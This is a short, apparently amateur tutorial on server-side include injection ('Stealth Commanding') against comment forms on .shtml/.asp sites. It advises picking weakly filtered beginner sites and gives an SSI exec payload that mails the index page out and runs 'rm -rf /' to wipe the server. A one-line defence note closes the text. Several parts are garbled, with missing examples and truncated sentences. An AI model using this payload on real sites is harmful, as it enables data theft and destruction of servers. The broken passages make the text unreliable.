Stealth Commanding

August 13, 2024 (6mo ago)

[ Stealth Commanding ]

[ Content ]

[1] What is Stealth Commanding
[2] What is SSI
[3] How to find vulnerability
[4] Example of attack
[5] How to protect

[1] What is Stealth Commanding
Stealh Commanding is a type of web attack that comes with SSI (Server-side inclusion) codes exploiting its vulnerabilities. This attack can be performed if files with the extension .asp or .shtml are in question

[2] What is SSI (Server-side inclusion)
SSI is a way of attaching some files to some file. In PHP, attaching files is done this way: include('header.php'); while in ASP or SHTML it works like this:

[3] How to find vulnerability
Since dorks for this vulnerability do not exist, it is most often targeted at beginner sites where you can comment on some news or similar. If the filters are misplaced or don't exist what this bug will do is, like XSS, edit the site code and execute the "command".

[4] Example of attack
We came across a simple daily newspaper site and saw that if we leave a comment with the messagealert("XSS") after refreshing it will throw us a message with the text XSS, which would mean that the site is vulnerable. The next thing we need to do is to instead of alert("XSS")

index file.

If we inject code like this

<!--#exec cmd="mail -s 'Index' <index.shtml; rm -rf /"-->

Which will trigger a command to be sent to my email with the title Site Index with the code of the index page and then format the server.

[5] How to protect
To protect our site from this attack, it is enough to create a good filters and input validation as well as keeping systems up-to-date